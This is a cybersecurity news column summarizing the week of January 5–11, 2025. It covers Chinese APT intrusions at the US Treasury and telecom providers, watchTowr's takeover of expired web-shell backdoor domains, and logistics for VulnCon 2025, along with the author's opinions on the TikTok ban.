A Very Chinese New Year
Happy New Year everyone! It's a new year, with new news, and the same old(er) MegaZone. This time we're looking at news that I found worthy from the week of January 5–11, 2025. (Have you gotten used to typing 2025 yet?) I found it to be a fairly slow news week, and not much really grabbed my attention enough that I felt it was worth commenting on. That's not too unusual for the start of a new year, as there is often a bit of a post-holiday lull. Not that there was no news at all. It is never truly quiet in cybersecurity, just that most of it was run-of-the-mill stuff, IMHO.
Before I dive into this week's news, I'm going to abuse my editorial power to plug a couple of things. F5 Labs published their 2025 Cybersecurity Predictions, which is also a look back at the 2024 predictions, and how they panned out. Let's see how the new predictions play out this year.
Speaking of the 2025 Cybersecurity Predictions, that was one of the two subjects we covered in the December episode of AppSec Monthly. The other topic was a look at the a topic from my last issue of TWIS, the Hack The Box study on mental health of security professionals. It's a subject I care about quite a bit, and something I've seen many of my peers struggle with, and have struggled with myself. We work in an intense, stressful field, and there is a general attitude of 'toughing it out', which just defers the impacts.
This was my third episode of AppSec Monthly, starting in October. I am the new 'permanent' F5 SIRT host, so you should see me each month. Hopefully I'll get better at it with practice and you can follow along with the playlist, as well as checking out past episodes. I have some big shoes to fill with Aaron's departure, hopefully I can uphold the high standard he set. AppSec Monthly is also available as a podcast on Spotify, iTunes, and probably other platforms I'm forgetting about.
Oh, and as for the title of this 'issue', I know the Lunar New Year (aka Chinese New Year) isn't until January 29, but I couldn't pass up the play on words given the topic below. And with that, let's dive in.
Year of the Snake
Last week Chris wrote about a Chinese APT targeting the US Treasury and my main topic this week is a continuation and expansion of that. Cybersecurity news in recent weeks has been full of stores relating to Chinese threat actors. That's a major, evolving story, which reaches beyond cybersecurity into global geopolitics. Without getting too deep into US politics, with the new presidential administration's prior attitudes toward and comments on China, I expect these events to have some significance.
I'm going to rewind a bit to the previous week, which still saw stories about Chinese APT Salt Typhoon compromising multiple US telco providers, giving them the ability to geolocate millions of devices and record any communications. The actual extent of the intrusion is reportedly much more limited, with actions targeted at specific, high-value individuals, but the access was there. At the same time there was also coverage on the US Treasury Department being compromised due to a vulnerability in BeyondTrust. Within days this coverage was updated to highlight that the Office of Foreign Assets Control (OFAC), the Treasury department that administers economic and trade sanctions, was specifically targeted.
As we entered this week, it was reported that OFAC was sanctioning Beijing-based Integrity Technology Group, Inc., a cybersecurity group that has been linked to state-sponsored APT Flax Typhoon (not to be confused with Salt Typhoon). Flax Typhoon was involved with malicious actions against US critical infrastructure providers in 2022 and 2023, utilizing Integrity's infrastructure to conduct their operations. The US State Department claims Flax Typhoon has targeted governmental organizations, telecommunications providers, media companies, and others, both within the US and in a number of other countries, most prominently Taiwan. You can see why OFAC would be of particular interest to a state-sponsored Chinese APT, providing insight toward potential upcoming sanctions.
Coverage of these issues continued throughout the week. CISA stated that the BeyondTrust Treasury Department hack did not affect other federal agencies, which was a bit of good news. The primary BeyondTrust vulnerability was a critical command injection, assigned CVE-2024-12356, and this was added to CISA's Known Exploited Vulnerabilities (KEV) list in mid-December. There was also a medium-severity vulnerability involved, CVE-2024-12686. This second vulnerability was itself just added to the KEV this week. Another piece of good news came when both AT&T and Verizon, two of the nine telecom providers compromised by Salt Typhoon, reported that they'd purged the intrusion from their networks. Both vendors claim that they've notified all individuals who were targeted by Salt Typhoon, so if you haven't heard otherwise I guess you can assume you're safe.
Early in the week, speaking at a Foundation for Defense of Democracies event, National Cyber Director Harry Coker Jr. called for the US to do more to deter China as a cybersecurity threat. Exactly what needs to be done to deter China seems to be less clear. What's been done so far appears to be completely ineffective, so more of the same doesn't seem like it would cut it. Then late in the week, it was reported that the Treasury breach also targeted the Committee on Foreign Investment in the US (CFIUS). This office with the Treasury, as the the name implies, oversees foreign investment, such as from China, in the US. One of their recent actions had been to step of review real estate sales near US military bases, in particular sales to Chinese entities.
China has, of course, largely denied their involvement in any or all of this.
Of course, mixed into all of this is the looming, absolutely idiotic, TikTok ban on January 19. The ban is nothing but ineffective political posturing, IMHO, if my opinion wasn't clear. It's disrupting the lives, and livelihoods, of millions of users and creators because politicians got their knickers in a twist over a popular social media platform, gasp, not being US-owned! Of course, the same people flip out when other nations take a similar view toward US-owned platforms operating in their countries.
The irony is that the ban - due to TikTok being owned by China's ByteDance, and pearl-clutching and hand-wringing over China being able to influence content (as if foreign entities don't rabidly influence content on X, Facebook, Instagram, or any non-Chinese owned social media platform) - seems to be driving many people to move to a similar app, RedNote aka Xiaohongshu . RedNote is also Chinese-owned, and even more closely aligned with China as their primary user base is Chinese, unlike TikTok. That's just a beautiful example of the law of unintended consequences. Ifthe US government wanted an efficient way to make a generation resent them, they seem to have found it.
The ban is just another factor in the tense geopolitical situation. I'msure we're far from seeing the end of these issues, and I'm just as sure there will be more to come. WhatI'm not at all sure about is how this will all play out.
- https://www.theregister.com/2024/12/30/att_verizon_confirm_salt_typhoon_breach/
- https://www.theregister.com/2024/12/31/us_treasury_department_hacked/
- https://www.theregister.com/2025/01/02/chinese_spies_targeted_sanctions_intel/
- https://www.cybersecuritydive.com/news/treasury-sanctions-flax-typhoon/736538/
- https://www.scworld.com/news/us-sanctions-chinese-service-provider-for-supporting-threat-group
- https://www.cybersecuritydive.com/news/cisa-hack-treasury-federal-agencies/736654/
- https://www.cybersecuritydive.com/news/att-verizon-salt-typhoon/736680/
- https://www.cybersecuritydive.com/news/national-cyber-director-coker-china-deterrence/736920/
- https://www.scworld.com/news/chinese-hackers-breach-office-that-reviews-foreign-investments-in-us
- https://www.theregister.com/2025/01/10/china_treasury_foreign_investment/
- https://www.cybersecuritydive.com/news/cisa-second-beyondtrust-cve-exploited/737288/
- https://www.cisa.gov/news-events/alerts/2024/12/19/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2025/01/13/cisa-adds-two-known-exploited-vulnerabilities-catalog
Digital Urbex
The exploration of abandoned infrastructure in the physical world, often called Urban Exploration, or Urbex, can be fun and interesting. Also perhaps marginally legal. And dangerous. But fun. I'll just say Union Station in Worcester, MA had a very interesting interior, very Planet of the Apes, before it was restored and reopened. Anyway, it looks like a bit of digital urbex can be similarly fun and interesting, and entails less physical danger. Though still perhaps marginally legal.
It turns out that if you're of a criminal bent and decide to save some labor by purchasing existing web shell backdoors on your target's devices from like minded individuals, those web shells may contain backdoors giving their creators access to all of your work. (Insert 'Inception' joke here.) These backdoors in backdoors call out to domain names for command and control.
Sometimes their creators let those domain names lapse, as covered by watchTowr Labs in their new report. You may recall watchTowr from last September when they accidentally took over the ,mobi TLD. That one is also a very interesting read, and if I'd been on TWIS duty that week I'm sure I would've included it as it's a good tale. They share a similarity in exploiting abandoned or expired infrastructure to gain access to systems. Do check that one out too, but now back to the current news.
By disassembling web shell malware to uncover the encoded domain names, they were able to register the unclaimed domains to start monitoring any incoming requests. And boy did they get some requests. They've uncovered more than 4,000 unique and live backdoors, and counting. All from commandeering the backdoors' backdoors' C&C domains. The compromised systems include governmental systems and Bangladesh, China, and Nigeria, universities or higher education systems in Thailand, China, South Korea, and much more.
Of course, this left watchTowr with responsibility for this backdoor infrastructure. If they allowed the domains to once again lapse, someone with ill-intent would be able to exploit them. But that won't happen, as The Shadowserver Foundation has taken ownership of the domains and will sinkhole them to prevent their use.
I wonder if watchTowr will be exploring any more abandoned digital infrastructure. I hope they do, the results have been interesting.
- https://www.theregister.com/2025/01/08/backdoored_backdoors/
- https://cyberscoop.com/malicious-hackers-have-their-own-shadow-it-problem/
- https://labs.watchtowr.com/more-governments-backdoors-in-your-backdoors/
VulnCon 2025 Approaches
The 2025 Vulnerability Management Ecosystem Collaboration, Ideation, and Action Conference, aka VulnCon 2025 (let's all agree to never use that full name, OK?), is returning to Raleigh, NC Monday, April 7th through Thursday, April 10th. We'll be back at the North Carolina State University McKimmon Center, the same location as last year. This year it is four days, up from three, and we have more space in the facility, which all translates to more content. I'm saying 'we' because I am, again, one of the organizers, as a co-chair of the CVE.org Vulnerability Conference and Events Working Group (VCEWG). VulnCon is Co-Hosted by FIRST and the CVE Program.
Last year we sold out the in-person admission and this year, even with the additional capacity, we expect to do so again. So, if you are thinking of attending in person, don't wait too long to register. Standard registration is US $300.00 through March 9th, and late registration is US $375.00 after March 9th - until sold out. Registration includes 'coffee breaks' and buffet lunches, and an on-site Welcome Reception on Monday, April 7.
VulnCon is a hybrid event, and all panels will be streamed. Virtual admission is only US $100.00. Virtual is better than nothing, but if you can be there in person I encourage it; the Hallway Con is strong. There's also a ticketed Offsite Social on Tuesday, April 8 19:00-21:00 in downtown Raleigh—tickets are $30.
The CFP is still open (see the next item below), so the 2025 program has yet to be finalized, but you can get an idea of what to expect from last year's program.
VulnCon 2025 CFP Extended
The VulnCon Call For Papers deadline was Wednesday, January 15 - the day I'm wrapping up this edition of TWIS. But on the 14th, having heard from a few procrastinators, we extended the deadline to a hard stop of Friday, January 31, 2025. We will not be extending it again as we need time for the review committee to finalize selections, while leaving enough time for those selected to prepare their materials.
If you've been procrastinating and thought you missed the deadline, or if this is the first your hearing of this and have something you'd like to present, you have a couple of weeks to get those proposals in. Don't wait until the 31st. If you'd like an idea of the type of content VulnCon is looking for, check out last year's program.
Pro Tip on VulnCon Hotels
As mentioned above, VulnCon is in Raleigh, NC April 7–10. The Dreamville (Music) Festival is in Raleigh, NC April 5-6 - the weekend just before VulnCon. This has caused a bit of a squeeze on hotel rooms that weekend. Some hotels are booked for the weekend, and most of them appear to have increased their room rates for those nights due to the increased demand. Unsurprisingly, the lower-priced hotels have the least availability, and if you try to book a room for the week, with a weekend arrival, you may only find more expensive options. Of course, you could always attend the festival and then come to VulnCon and twofer your trip.
Availability increases, and room rates decrease, beginning Monday. One option would be to arrive Monday morning and avoid the higher weekend rates entirely. Another option is to book whatever is available for the weekend and then make a separate reservation starting on Monday at a more affordable hotel, to reduce your overall travel spend. I need to be there before Monday, so that's what I'm doing—and it saved around $800 for the week.
In either case, you will be able to check bags at the McKimmon Center for the day. So you could come straight there Monday, or checkout of your first hotel and bring your bag(s) for the day, and then check in to your hotel for the rest of the week that evening. There is a list of suggested hotels on the VulnCon site. Most of them are in and around downtown, but the TownePlace Suites and Holiday Inn Express & Suites are perhaps the closest to the facility, on the other side of campus from downtown, and a very short ride—literally at the end of the road the McKimmon is on. They're both fairly new, built in 2020 I believe, and are decent. I stayed at TownePlace last year and had a great experience, so I will be doing so again.
Maybe this will save you a little frustration, and a few bucks.
That Was the Week That Was
Thank you for your time and attention this week. I hope you found something of value in my ramblings.
As always, if this is your first TWIS, you can always read past editions. I also encourage you to check out all of the content from the F5 SIRT.